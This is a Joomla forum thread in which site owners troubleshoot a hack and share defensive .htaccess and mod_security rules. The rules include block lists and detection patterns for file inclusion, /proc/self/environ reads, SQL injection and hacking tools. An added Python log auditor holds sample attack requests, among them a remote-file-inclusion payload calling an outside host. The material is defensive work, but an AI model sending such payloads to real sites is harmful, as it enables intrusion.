The Joomla! Forum ™
PostPosted: Wed Jan 05, 2011 7:22 am 
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
Hi Alex,
so here we find the biggest problem, why someone hacked your website. My previous post:
Quote:
I am not convinced. If the file permission is 644, how can allow_url_fopen hack the website? Maybe I missed something in the server logs.

I missed mod_security.
Now I am 100% convinced that yes, it's an XSS attack. Switch your hosting as soon as possible. Also give this report to your hosting provider.
Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today


PostPosted: Thu Jan 06, 2011 5:37 am 
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Hi Abhijeet and Leolam,

thanks a lot for all your comments!

@Leolam: By output, do you mean the log files of mod_security?
I will contact Smart Telecom about the issue and hope that they proceed with the necessary steps. I asked a local colleague if we can do something about the hacker (I know where he lives and which university he attended, since he uses the same name for his Facebook account as he named his hack identity, so it wouldn't be a problem to find out his real name with little effort), but he said that the police won't do anything about it. So I'm curious what will happen.

Unfortunately I don't have a copy of the infected files anymore. I don't store the password in Filezilla anymore, but before the hack, yes, I did. Regarding the name rights: I will talk with my local colleague and ask him again about this issue (we contacted a new host in Jakarta before and they mailed us the procedure; it takes two months to switch the name rights because of a national regulation, further details later). Thanks again for all your input!

@Abhijeet: Can you simply integrate these code snippets:
SecFilter "<( |\n)*script"
SecFilter "<(.|\n)+>"
in the .htaccess file? Do I also have to integrate this snippet:
SecFilterEngine On?
Are there other important snippets (e.g. SecFilterCheckURLEncoding On)?
I will do this in case mod_security is not enabled on my server. Thanks!
Do you mean mod_security leaves its traces in the raw log files and they are not present in mine?

As soon as my host provides me with some info, I will write it here!

Could anyone confirm that PHP 5.3.3 and MySQL 5.5.8 are the latest release versions for Apache?

Kind regards

Alex


Last edited by Alex-DED on Thu Jan 06, 2011 6:07 am, edited 1 time in total.

PostPosted: Thu Jan 06, 2011 5:51 am 
Joomla! Fledgling

Joined: Mon Apr 07, 2008 4:51 pm
Posts: 4
The hacker claims to be using a Joomla vulnerability, if you can believe him. I did locate a suspicious .configure.php in one of my sites' roots and a folder labeled neo.

I've been updating all my sites to the latest patch and have been chewing through logs. The hacker is using different IP addresses to access, not just with Smart Telecom; I would be surprised if he's not freeloading off available wifi signals.

I'll be honest, I know little about this and how to stop/prevent this from continuing until I switch hosts. I'm currently using GoDaddy for these sites and have been intending to move for a while now, but their support response was pathetic, so that move will become priority 1 now.

Any recommendations for good shared hosting or inexpensive VPS hosts?

Oh yeah, if you chat with this guy he keeps asking for money, basically saying he'll go away if you pay him off.


PostPosted: Thu Jan 06, 2011 6:22 am 
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
Hello kdminc & Alex,
just replace your .htaccess file with this file:
http://www.sigsiu.net/presentations/for ... bsite.html
I am sure such kinds of attacks are not possible again.
That's what I can say now.
This .htaccess code will block all your attacks with these lines:
Code:
# Deny access to php, xml and ini files
# within components and plugins directories
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]
RewriteCond %{REQUEST_URI} \/components\/ [OR]
RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]
RewriteCond %{REQUEST_URI} \/language\/ [OR]
RewriteCond %{REQUEST_URI} \/libraries\/ [OR]
RewriteCond %{REQUEST_URI} \/modules\/ [OR]
RewriteCond %{REQUEST_URI} \/plugins\/ [OR]
RewriteCond %{REQUEST_URI} \/templates\/ [OR]
RewriteCond %{REQUEST_URI} \/xmlrpc\/
RewriteRule ^(.*)$ index.php [R=404,L]
#### @RS


Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today


PostPosted: Thu Jan 06, 2011 6:54 am 
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 12046
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
kdminc wrote:
The hacker claims to be using a Joomla vulnerability
Nonsense. He is using an unsecured account which had bad passwords, or bad hosting. GoDaddy has had tons of hacks over the past few months (elsewhere documented in the forum).
Quote:
I would be surprised if he's not freeloading off available wifi signals.
Not possible if you set up your wifi with WPA2-PSK with AES encryption.
Quote:
if you chat with this guy he keeps asking for money, basically saying he'll go away if you pay him off
Why on earth are you chatting with a hacker.... You give him a hard-on by acknowledging him. Don't!

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---


Last edited by ooffick on Sat Jan 08, 2011 9:14 pm, edited 2 times in total.
Mod Note: Removed self promotion. Please read the Forum rules for details.


PostPosted: Thu Jan 06, 2011 8:33 am 
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Hi Abhijeet,

thanks for the code and link. I have integrated the missing parts into my existing .htaccess file!
I post it below, maybe it's useful for someone. I have merged several recommendations for .htaccess files, mainly based on the Master File by Nicholas K. Dionysopoulos, Akeeba (I deleted some code from this file because my website crashed because of it).
Private data were replaced by "XXX".

Code:
##
# @version $Id: htaccess.txt 10492 2010-12-28, based on Master-htaccess by Nicholas K. Dionysopoulos, Akeeba
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################


########## Begin - RewriteEngine enabled
RewriteEngine On
########## End - RewriteEngine enabled


########## Begin - No directory listings
IndexIgnore *
# Apache rejects a mix of absolute (All) and relative (+/-) options on one line
Options +FollowSymLinks -Indexes
########## End - No directory listings


########## Begin - Redirect non-www to www
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
########## End - Redirect non-www to www


########## Begin - File injection protection, by SigSiu.net
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]\=http:\/\/(.*)
RewriteRule ^(.*)$ - [R=404,L]
########## End - File injection protection


########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
# If the request contains /proc/self/environ (by SigSiu.net)
RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]
# Legacy configuration variable injection
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode stuff to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script trying to base64_decode stuff to send via URL
RewriteCond %{QUERY_STRING} base64_decode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Instead of using 403, we'd better use 404 (Not Found) to confuse hackers
RewriteRule ^(.*)$ index.php [R=404,L]
########## End - Rewrite rules to block out some common exploits


########## Begin Deny access to php, xml and ini files
# within components and plugins directories
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]
RewriteCond %{REQUEST_URI} \/components\/ [OR]
RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]
RewriteCond %{REQUEST_URI} \/language\/ [OR]
RewriteCond %{REQUEST_URI} \/libraries\/ [OR]
RewriteCond %{REQUEST_URI} \/modules\/ [OR]
RewriteCond %{REQUEST_URI} \/plugins\/ [OR]
RewriteCond %{REQUEST_URI} \/templates\/ [OR]
RewriteCond %{REQUEST_URI} \/xmlrpc\/
RewriteRule ^(.*)$ index.php [R=404,L]
########## End Deny access to php, xml and ini files


########## Begin Prevent most common SQL-Injections
# variable name written in upper case like the rest of the file
RewriteCond %{QUERY_STRING} concat.*\( [NC,OR]
RewriteCond %{QUERY_STRING} union.*select.*\( [NC,OR]
RewriteCond %{QUERY_STRING} union.*all.*select [NC]
RewriteRule ^(.*)$ index.php [F,L]
########## End Prevent most common SQL-Injections


#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)
# RewriteBase /


########## Begin - Advanced server protection
# Advanced server protection - August 2010
# by Nicholas K. Dionysopoulos
## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine
## your PHP version). See http://www.0php.com/php_easter_egg.php and
## http://osvdb.org/12184 for more information
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F36-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F34-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPE9568F35-D428-11d2-A769-00AA001ACF42 [OR]
RewriteCond %{QUERY_STRING} ^%3F=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 [NC]
RewriteRule ^(.*)$ - [F,L]

## Back-end protection
## This also blocks fingerprinting attacks browsing for XML and INI files
#RewriteRule ^(administrator[/]?)$ administrator/index.php [L]
#RewriteRule ^(administrator/index.htm[l]?)$ $1 [L]
#RewriteRule ^(administrator/index.php)$ $1 [L]
#RewriteRule ^(administrator/index[2,3].php)$ $1 [L]
#RewriteRule ^(administrator/(components|modules|templates|images|plugins)/.*\.(jpe[g,2]?|jpg|png|gif|bmp|css|js|swf|htm[l]?))$ $1 [L]
#RewriteRule ^administrator/(.*)$ - [R=404,L]

## Disallow front-end access for certain Joomla! system directories
RewriteRule ^(includes/js/.*)$ $1 [L]
RewriteRule ^(cache|includes|language|libraries|logs|tmp)/.*$ - [R=404,L]

## Allow limited access for certain Joomla! system directories with client-accessible content
RewriteRule ^((components|modules|plugins|templates)/.*\.(jp[g,2,eg]?|png|gif|bmp|css|ico|js|swf|htm[l]?))$ $1 [L]
RewriteRule ^((components|modules|plugins|templates)/.*index\.php(.*))$ $1 [L]
RewriteRule ^(templates/.*\.php)$ $1 [L]
RewriteRule ^(components|modules|plugins|templates)/.*$ - [R=404,L]

########## End - Advanced server protection


########## Begin - Basic antispam Filter, by SigSiu.net
## I removed some common words, tweak to your liking
## (variable name written in upper case like the rest of the file; duplicate "viagra" line dropped)
RewriteCond %{QUERY_STRING} \bviagra\b [NC,OR]
RewriteCond %{QUERY_STRING} \bambien\b [NC,OR]
RewriteCond %{QUERY_STRING} \bblue\spill\b [NC,OR]
RewriteCond %{QUERY_STRING} \bcialis\b [NC,OR]
RewriteCond %{QUERY_STRING} \bcocaine\b [NC,OR]
RewriteCond %{QUERY_STRING} \bejaculation\b [NC,OR]
RewriteCond %{QUERY_STRING} \berectile\b [NC,OR]
RewriteCond %{QUERY_STRING} \berections\b [NC,OR]
RewriteCond %{QUERY_STRING} \bhoodia\b [NC,OR]
RewriteCond %{QUERY_STRING} \bhuronriveracres\b [NC,OR]
RewriteCond %{QUERY_STRING} \bimpotence\b [NC,OR]
RewriteCond %{QUERY_STRING} \blevitra\b [NC,OR]
RewriteCond %{QUERY_STRING} \blibido\b [NC,OR]
RewriteCond %{QUERY_STRING} \blipitor\b [NC,OR]
RewriteCond %{QUERY_STRING} \bphentermin\b [NC,OR]
RewriteCond %{QUERY_STRING} \bprosac\b [NC,OR]
RewriteCond %{QUERY_STRING} \bsandyauer\b [NC,OR]
RewriteCond %{QUERY_STRING} \btramadol\b [NC,OR]
RewriteCond %{QUERY_STRING} \btroyhamby\b [NC,OR]
RewriteCond %{QUERY_STRING} \bultram\b [NC,OR]
RewriteCond %{QUERY_STRING} \bunicauca\b [NC,OR]
RewriteCond %{QUERY_STRING} \bvalium\b [NC,OR]
RewriteCond %{QUERY_STRING} \bvicodin\b [NC,OR]
RewriteCond %{QUERY_STRING} \bxanax\b [NC,OR]
RewriteCond %{QUERY_STRING} \bypxaieo\b [NC]
RewriteRule ^(.*)$ - [R=404,L]
########## End - Basic antispam Filter, by SigSiu.net


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section


########## Begin - Common hacking tools and bandwidth hoggers block
## By SigSiu.net and @nikosdion.
## WARNING: This will also block old versions of JoomlaPack Remote
## and will disallow running CRON jobs using wget.
# The following rules are for common hacking tools:
SetEnvIf user-agent "Indy Library" stayout=1
SetEnvIf user-agent "libwww-perl" stayout=1
SetEnvIf user-agent "Wget" stayout=1
# The following rules are for bandwidth-hogging download tools
SetEnvIf user-agent "Download Demon" stayout=1
SetEnvIf user-agent "GetRight" stayout=1
SetEnvIf user-agent "GetWeb!" stayout=1
SetEnvIf user-agent "Go!Zilla" stayout=1
SetEnvIf user-agent "Go-Ahead-Got-It" stayout=1
SetEnvIf user-agent "GrabNet" stayout=1
SetEnvIf user-agent "TurnitinBot" stayout=1
# This line denies access to all of the above tools
deny from env=stayout
########## End - Common hacking tools and bandwidth hoggers block


########## Begin - Block BadBots
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^Libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^DataCha0s/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.1" bad_bot
SetEnvIfNoCase User-Agent "^StackRambler/2.0" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
########## End - Block BadBots


Kind regards

Alex
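Added example, not from the thread and not Akeeba's or SigSiu.net's code: a Python script that replays the QUERY_STRING conditions from the .htaccess above (Abhijeet's earlier snippet is repeated inside it) over Apache access-log lines, so you can see which logged requests the rules would have stopped. It covers only the query-string conditions, not the REQUEST_FILENAME/directory ones, and the log lines are constructed samples.

```python
import re
from typing import List, Tuple

# QUERY_STRING conditions copied from the posted .htaccess, each paired with
# whether the line carries the [NC] (case-insensitive) flag. Apache matches
# them against the raw, still URL-encoded query string, so no decoding here.
QUERY_RULES: List[Tuple[str, str, bool]] = [
    ("file-injection",    r"[a-zA-Z0-9_]\=http:\/\/(.*)",      False),
    ("proc-self-environ", r"proc\/self\/environ",              False),
    ("mosConfig",         r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)", False),
    ("base64_encode",     r"base64_encode.*\(.*\)",             False),
    ("base64_decode",     r"base64_decode.*\(.*\)",             False),
    ("script-tag",        r"(\<|%3C).*script.*(\>|%3E)",        True),
    ("GLOBALS",           r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})",     False),
    ("_REQUEST",          r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})",    False),
    ("sqli-concat",       r"concat.*\(",                        True),
    ("sqli-union-select", r"union.*select.*\(",                 True),
    ("sqli-union-all",    r"union.*all.*select",                True),
]

# Apache common log format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def matching_rules(query: str) -> List[str]:
    """Names of the posted RewriteCond patterns that a raw query string trips."""
    hits = []
    for name, pattern, nocase in QUERY_RULES:
        if re.search(pattern, query, re.IGNORECASE if nocase else 0):
            hits.append(name)
    return hits


def audit_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, path, rule names) for every request the rules would block."""
    blocked = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line; skip it
        ip, _ts, _method, target, _status = m.groups()
        path, _, query = target.partition("?")
        hits = matching_rules(query)
        if hits:
            blocked.append((ip, path, hits))
    return blocked


# Constructed sample lines (not from the thread's server); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2011:05:37:01 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [06/Jan/2011:05:37:02 +0000] "GET /index.php?mosConfig_absolute_path=http://198.51.100.7/x.txt? HTTP/1.1" 200 311',
    '192.0.2.12 - - [06/Jan/2011:05:37:03 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%201,2,3 HTTP/1.1" 200 222',
    '192.0.2.13 - - [06/Jan/2011:05:37:04 +0000] "GET /index.php?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 222',
    '192.0.2.14 - - [06/Jan/2011:05:37:05 +0000] "GET /components/com_x/file.php?cmd=../../../../proc/self/environ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, path, hits in audit_log(SAMPLE_LOG):
        print(f"{ip} {path} would be blocked by: {', '.join(hits)}")
```

A request that shows up in the log with status 200 but trips a rule here is one the old .htaccess let through, which is what you want to know when deciding whether the new rules are worth keeping.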


PostPosted: Thu Jan 06, 2011 8:35 am 
Joomla! Fledgling

Joined: Mon Apr 07, 2008 4:51 pm
Posts: 4
Joomla's had numerous vulnerabilities; however, I believe this was actually one in an old installation of Facile Forms.

I've never gone anywhere populated where I couldn't find an unsecured wireless access point.

I don't care if some script kiddie gets wood while I chat with him if it leads me to additional undetected vulnerabilities in my account.

Thanks for the recommendations for hosting LeoLam, but I'm not sure I value your opinion/judgement based on what you've said so far.

Kurchania, thank you for your efforts. I had already updated my .htaccess files during the cleanup process but will review your suggestions and likely integrate them; they are appreciated.


PostPosted: Thu Jan 06, 2011 8:54 am 
Joomla! Hero

Joined: Mon Sep 21, 2009 6:56 am
Posts: 2065
Location: indore,india
Hi kdminc,
Quote:
Thanks for the recommendations for hosting LeoLam but I'm not sure I value your opinion/judgement based on what you've said so far

Leo is suggesting this for Alex, I guess, because Alex wants to switch his hosting network.

@alex,
try to run the URLs that you found in your server logs to make sure that yes, now you are secure and your .htaccess works fine. Hit all the URLs with which the hacker attempted to crack your website.
Anyway, if you find any trouble, we all are here.

You know guys, at least you both know why your site was hacked; one of my sites was hacked previously and still I am unable to find the reason. :D


Quote:
please close this topic now Alex

Regards
Abhijeet

_________________
abhijeet kurchania
The future depends on what you do today


PostPosted: Thu Jan 06, 2011 10:16 am 
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 12046
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
kdminc wrote:
Thanks for the recommendations for hosting LeoLam but I'm not sure I value your opinion/judgement based on what you've said so far
Well, I am happy that over 6,000 clients and over 18,500 resolved professional support requests do value my and our support; otherwise my staff and my family would have little bread and butter..... (did you see the stickies at the beginning of this forum? ;-) )

BTW, Joomla's vulnerabilities have always been addressed with the highest speed.... Guess why we are on Joomla 1.5.22, of which the last 6 or 7 are actually only security releases. If you want to know about vulnerable extensions please visit http://feeds.joomla.org/JoomlaSecurityV ... Extensions. Mentioning FF makes little sense since that product has been dead for over 4 years. The VEL is actualized daily.

But I have no further problems leaving you in the good hands of Abhijeet.

I wish you all the best

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---


PostPosted: Fri Jan 07, 2011 7:00 am 
Joomla! Apprentice

Joined: Tue Dec 28, 2010 1:17 am
Posts: 20
Thanks to all who joined the thread, especially to Abhijeet and Leolam, who really helped me a lot!! Thanks for your time and effort!!
@leolam: the link to the Indonesian agency for internet names:
http://www.pandi.or.id/brief-guide-in-english/ (box on the top right where something with "30" is written)
It's not two months but only one month that you have to stick with your old host until you switch to the new one, sorry for the mistake (in my past post I meant that I registered the name with the host, not that it belongs to him, sorry for the imprecise statement)!

Kind regards

Alex

